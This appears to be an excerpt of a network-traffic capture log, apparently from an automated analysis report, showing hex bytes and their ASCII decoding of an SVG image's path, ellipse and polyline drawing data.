                                                                                                                                                                                                                                                                          Data Ascii: ss="cls-9" d="M512.74,77.11a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.24,2.24,0,0,1,.48-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M512.52,70.62a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11131INData Raw: 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2e 31 38 2c 31 30 38 2e 36 33 61 31 2e 36 2c 31 2e 36 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 38 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 38 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 34 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 30 2c 31 30 32 2e 31 34 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e
                                                                                                                                                                                                                                                                          Data Ascii: 4,2.67"/><path class="cls-9" d="M540.18,108.63a1.6,1.6,0,0,1-.73,2.08,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.48-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.14,2.67"/><path class="cls-9" d="M540,102.14a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11147INData Raw: 31 39 37 63 36 2e 37 35 2d 32 2e 37 31 2c 31 36 2e 31 31 2d 35 2e 36 2c 32 31 2e 37 35 2d 31 30 2e 31 33 4c 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 32 37 2d 37 2e 36 33 2c 32 2e 34 38 2d 32 38 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39 34 2c 33 2d 39 2e 38 35 2c 36 2e 31 32 2d 31 34 2e 38 34 2c 39 2e 30 36 2d 34 2e 38 33 2c 32 2e 38 34 2d 31 33 36 2e 33 2d 32 2e 35 31 2d 31 34 31 2e 38 37 2d 32 2e 31 37 6c 2d 38 33 2e 37 31 2c 35 63 2d 31 2e 38 37 2e 31 32 2d 33 32 2c 31 2e 31 36 2d 33 32 2e 31 33 2c 31 2e 39 34 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 36 22 20 64 3d 22 4d 39 30 30 2e 31 36 2c 31 37 34 6c 34 2e 33 34 2d 35 2e 36 33 2c 32 2e 34 31 2d 33 30 2e 32 36 2d 32 33 2e 36 39 2c 31 34 2e 34 35 63 2d 34 2e 39
                                                                                                                                                                                                                                                                          Data Ascii: 197c6.75-2.71,16.11-5.6,21.75-10.13L900.16,174l4.27-7.63,2.48-28.26-23.69,14.45c-4.94,3-9.85,6.12-14.84,9.06-4.83,2.84-136.3-2.51-141.87-2.17l-83.71,5c-1.87.12-32,1.16-32.13,1.94Z"/><path class="cls-16" d="M900.16,174l4.34-5.63,2.41-30.26-23.69,14.45c-4.9
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11163INData Raw: 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 2e 31 33 2e 37 38 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2e 36 36 2c 31 2e 37 35 2c 31 2e 37 35 2c 30 2c 30 2c 30 2c 2e 35 39 2e 34 35 2c 32 2c 32 2c 30 2c 30 2c 30 2c 31 2e 36 33 2c 30 2c 31 2e 37 35 2c 31 2e 37 35 2c 30 2c 30 2c 30 2c 2e 35 39 2d 2e 34 35 2c 31 2e 39 34 2c 31 2e 39 34 2c 30 2c 30 2c 30 2c 2e 33 37 2d 2e 36 36 41 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 30 2c 35 32 30 2e 33 34 2c 32 32 39 2e 30 35 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 35 32 34 2c 32 32 36 2e 32 32 71 30 2c 2e 32 31 2c 30 2c 2e 34 38 63 30 2c 2e 31 38 2c 30 2c 2e 33 33 2c 30 2c 2e 34 35 68 30 61 31 2e 36 36 2c 31 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 39 2d 2e 34 32 2c 32
                                                                                                                                                                                                                                                                          Data Ascii: 2.5,2.5,0,0,0,.13.78,1.94,1.94,0,0,0,.37.66,1.75,1.75,0,0,0,.59.45,2,2,0,0,0,1.63,0,1.75,1.75,0,0,0,.59-.45,1.94,1.94,0,0,0,.37-.66A2.5,2.5,0,0,0,520.34,229.05Z"/><path class="cls-2" d="M524,226.22q0,.21,0,.48c0,.18,0,.33,0,.45h0a1.66,1.66,0,0,1,.29-.42,2
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11179INData Raw: 37 32 20 36 36 33 2e 35 36 20 33 31 34 2e 32 35 20 36 37 31 2e 32 31 20 33 31 39 2e 30 32 20 36 37 30 2e 36 35 20 33 34 38 2e 39 33 22 2f 3e 3c 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 35 22 20 78 31 3d 22 36 37 31 2e 32 31 22 20 79 31 3d 22 33 32 36 2e 31 32 22 20 78 32 3d 22 36 38 38 2e 37 31 22 20 79 32 3d 22 33 32 34 2e 32 36 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 36 22 20 64 3d 22 4d 36 36 39 2e 31 39 2c 33 31 33 2e 33 34 76 32 63 30 2c 31 2e 33 36 2c 33 2e 32 33 2c 32 2e 34 36 2c 37 2e 32 31 2c 32 2e 34 36 73 37 2e 32 31 2d 31 2e 31 2c 37 2e 32 31 2d 32 2e 34 36 76 2d 32 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 36 37 36 2e 34 22 20 63 79 3d 22 33 31 33 2e 33 34 22
                                                                                                                                                                                                                                                                          Data Ascii: 72 663.56 314.25 671.21 319.02 670.65 348.93"/><line class="cls-75" x1="671.21" y1="326.12" x2="688.71" y2="324.26"/><path class="cls-76" d="M669.19,313.34v2c0,1.36,3.23,2.46,7.21,2.46s7.21-1.1,7.21-2.46v-2"/><ellipse class="cls-38" cx="676.4" cy="313.34"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11195INData Raw: 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 33 2e 34 35 22 20 72 78 3d 22 31 2e 32 22 20 72 79 3d 22 31 2e 35 34 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 38 2e 39 35 20 35 36 38 2e 37 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 37 22 20 63 78 3d 22 38 34 38 2e 36 34 22 20 63 79 3d 22 32 31 38 2e 37 34 22 20 72 78 3d 22 32 2e 32 34 22 20 72 79 3d 22 32 2e 38 38 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 35 2e 36 39 20 35 36 39 2e 38 38 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 2f 3e 3c 65 6c 6c 69
                                                                                                                                                                                                                                                                          Data Ascii: (-38.07)"/><ellipse class="cls-97" cx="848.64" cy="213.45" rx="1.2" ry="1.54" transform="translate(48.95 568.75) rotate(-38.07)"/><ellipse class="cls-97" cx="848.64" cy="218.74" rx="2.24" ry="2.88" transform="translate(45.69 569.88) rotate(-38.07)"/><elli
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11211INData Raw: 2e 32 39 2c 30 2c 30 2c 31 2c 2e 33 36 2d 2e 33 31 41 31 2e 36 37 2c 31 2e 36 37 2c 30 2c 30 2c 31 2c 38 31 35 2e 36 39 2c 32 35 31 2e 37 38 5a 6d 2d 2e 30 39 2d 31 2e 33 39 63 2e 34 37 2e 33 39 2e 34 39 2e 34 36 2e 34 39 2e 36 73 2d 2e 31 35 2e 34 2d 2e 33 36 2e 33 34 2d 2e 31 33 2d 2e 30 35 2d 2e 34 36 2d 2e 33 34 63 30 2d 2e 30 35 2d 2e 32 38 2d 2e 32 35 2d 2e 33 32 2d 2e 33 61 2e 33 2e 33 2c 30 2c 30 2c 31 2d 2e 30 39 2d 2e 32 33 2e 33 32 2e 33 32 2c 30 2c 30 2c 31 2c 2e 33 33 2d 2e 33 33 43 38 31 35 2e 32 36 2c 32 35 30 2e 31 34 2c 38 31 35 2e 33 34 2c 32 35 30 2e 31 38 2c 38 31 35 2e 36 2c 32 35 30 2e 33 39 5a 6d 31 2e 31 37 2e 34 36 61 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 32 33 2e 36 36 63 30 2c 2e 32 31 2d 2e 32 31 2e 32 38 2d 2e 34
                                                                                                                                                                                                                                                                          Data Ascii: .29,0,0,1,.36-.31A1.67,1.67,0,0,1,815.69,251.78Zm-.09-1.39c.47.39.49.46.49.6s-.15.4-.36.34-.13-.05-.46-.34c0-.05-.28-.25-.32-.3a.3.3,0,0,1-.09-.23.32.32,0,0,1,.33-.33C815.26,250.14,815.34,250.18,815.6,250.39Zm1.17.46a2.37,2.37,0,0,1,.23.66c0,.21-.21.28-.4
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11227INData Raw: 2e 39 31 6c 2e 31 34 2c 32 2e 32 37 61 33 2e 34 32 2c 33 2e 34 32 2c 30 2c 30 2c 30 2d 33 2e 36 31 2e 30 39 63 2d 32 2c 31 2e 32 31 2d 33 2e 32 38 2c 33 2e 37 31 2d 33 2e 37 2c 33 2e 34 37 73 2d 2e 32 33 2d 32 2e 31 32 2c 31 2e 33 39 2d 33 2e 35 31 53 39 32 32 2e 36 36 2c 32 38 34 2e 35 39 2c 39 32 35 2e 32 35 2c 32 38 34 2e 39 31 5a 22 2f 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 31 33 22 20 78 3d 22 39 33 30 2e 31 36 22 20 79 3d 22 32 38 35 2e 32 39 22 20 77 69 64 74 68 3d 22 33 2e 37 35 22 20 68 65 69 67 68 74 3d 22 33 2e 31 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 38 36 34 2e 30 36 20 35 37 33 2e 36 37 29 20 72 6f 74 61 74 65 28 2d 31 38 30 29 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31
                                                                                                                                                                                                                                                                          Data Ascii: .91l.14,2.27a3.42,3.42,0,0,0-3.61.09c-2,1.21-3.28,3.71-3.7,3.47s-.23-2.12,1.39-3.51S922.66,284.59,925.25,284.91Z"/><rect class="cls-113" x="930.16" y="285.29" width="3.75" height="3.1" transform="translate(1864.06 573.67) rotate(-180)"/><path class="cls-1
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11243INData Raw: 30 38 2d 33 2e 31 33 63 2d 31 2e 31 35 2d 34 2e 31 33 2d 35 2e 34 32 2d 34 2e 38 2d 39 2d 33 2e 36 34 2d 2e 39 2e 32 39 2d 33 2e 31 37 2c 31 2d 33 2e 34 35 2c 32 73 31 2e 31 32 2c 31 2e 36 2c 31 2e 33 33 2c 32 2e 34 37 63 2e 32 37 2c 31 2e 31 32 2d 2e 35 39 2c 32 2e 31 39 2e 33 34 2c 33 2e 32 36 61 33 2c 33 2c 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22
                                                                                                                                                                                                                                                                          Data Ascii: 08-3.13c-1.15-4.13-5.42-4.8-9-3.64-.9.29-3.17,1-3.45,2s1.12,1.6,1.33,2.47c.27,1.12-.59,2.19.34,3.26a3,3,0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11259INData Raw: 31 2c 39 31 2e 39 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 35 35 22 20 64 3d 22 4d 38 32 37 2e 35 34 2c 38 36 2e 31 63 2d 2e 31 34 2d 31 2e 36 2d 2e 37 39 2d 33 2e 37 39 2d 32 2e 38 32 2d 32 2e 36 31 41 31 2e 34 2c 31 2e 34 2c 30 2c 30 2c 30 2c 38 32 34 2c 38 35 63 30 2c 32 2e 34 33 2e 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c
                                                                                                                                                                                                                                                                          Data Ascii: 1,91.9Z"/><path class="cls-155" d="M827.54,86.1c-.14-1.6-.79-3.79-2.82-2.61A1.4,1.4,0,0,0,824,85c0,2.43.67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11275INData Raw: 31 37 2e 39 32 63 2d 2e 31 38 2c 30 2d 34 39 2e 31 32 2c 31 34 2e 31 36 2d 35 38 2e 35 37 2c 31 38 2e 36 2d 37 2e 31 33 2c 33 2e 33 35 2d 31 38 2e 37 33 2c 35 2e 34 33 2d 32 36 2c 38 2e 33 35 2d 34 2e 34 35 2d 2e 39 32 2d 32 33 2e 37 31 2d 36 2e 36 35 2d 32 36 2e 34 37 2d 39 2e 34 35 2c 30 2c 30 2d 31 33 2e 35 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38
                                                                                                                                                                                                                                                                          Data Ascii: 17.92c-.18,0-49.12,14.16-58.57,18.6-7.13,3.35-18.73,5.43-26,8.35-4.45-.92-23.71-6.65-26.47-9.45,0,0-13.5-3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11323INData Raw: 73 6c 61 74 65 28 34 37 2e 31 33 20 35 36 33 2e 32 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 32 35 22 20 63 79 3d 22 32 31 33 2e 37 31 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e
                                                                                                                                                                                                                                                                          Data Ascii: slate(47.13 563.29) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.25" cy="213.71" rx="0.15" ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="tran
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11339INData Raw: 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 39 33 20 35 35 30 2e 33 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 34 38 22 20 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20
                                                                                                                                                                                                                                                                          Data Ascii: "0.22" transform="translate(28.93 550.36) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.48" cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17"
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11371INData Raw: 34 2d 2e 35 32 2c 30 2d 31 2e 35 32 2e 31 33 2d 32 2e 30 36 2e 32 32 2d 2e 39 31 2e 37 33 2d 31 2e 37 33 2e 38 37 2d 32 2e 36 36 6c 2e 31 32 2e 30 36 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 53 56 47 2d 66 61 64 65 20 34 73 20 65 61 73 65 20 30 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e
                                                                                                                                                                                                                                                                          Data Ascii: 4-.52,0-1.52.13-2.06.22-.91.73-1.73.87-2.66l.12.06" style="display: block; animation: SVG-fade 4s ease 0s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11387INData Raw: 20 32 30 30 2e 35 38 20 36 31 30 2e 36 34 20 32 30 36 2e 30 34 20 36 31 30 2e 38 35 20 32 31 32 2e 37 34 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 37 31 20 32 32 31 2e 31 37 20 35 39 30 2e 31 38 20 32 32 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37
                                                                                                                                                                                                                                                                          Data Ascii: 200.58 610.64 206.04 610.85 212.74"></polyline><polyline class="cls-53" points="577.71 221.17 590.18 225.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11403INData Raw: 3d 22 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 53 56 47 2d 66 61 64 65 20 32 73 20 65 61 73 65 20 30 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30
                                                                                                                                                                                                                                                                          Data Ascii: ="display: block; animation: SVG-fade 2s ease 0s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11419INData Raw: 30 2c 2e 34 39 73 30 2c 2e 33 35 2c 30 2c 2e 34 37 68 30 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2c 2e 37 31 2d 2e 38 31 2c 31 2e 37 36 2c 31 2e 37 36 2c 30 2c 30 2c 31 2c 31 2d 2e 33 31 2c 31 2e 38 37 2c 31 2e 38 37 2c 30 2c 30 2c 31 2c 2e 34 35 2c 30 6c 30 2c 31 61 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a
                                                                                                                                                                                                                                                                          Data Ascii: 0,.49s0,.35,0,.47h0a1.92,1.92,0,0,1,.71-.81,1.76,1.76,0,0,1,1-.31,1.87,1.87,0,0,1,.45,0l0,1a2.12,2.12,0,0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11451INData Raw: 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 33 34 2c 32 30 38 2e 36 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61
                                                                                                                                                                                                                                                                          Data Ascii: path class="cls-4" d="M700.34,208.66a1.71,1.71,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.33-.94,2.41,2.41,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a
                                                                                                                                                                                                                                                                          2023-07-05 06:07:50 UTC11467INData Raw: 22 20 64 3d 22 4d 37 33 31 2e 38 31 2c 33 30 34 2e 37 37 41 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2c 37 33 31 2c 33 30 37 61 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 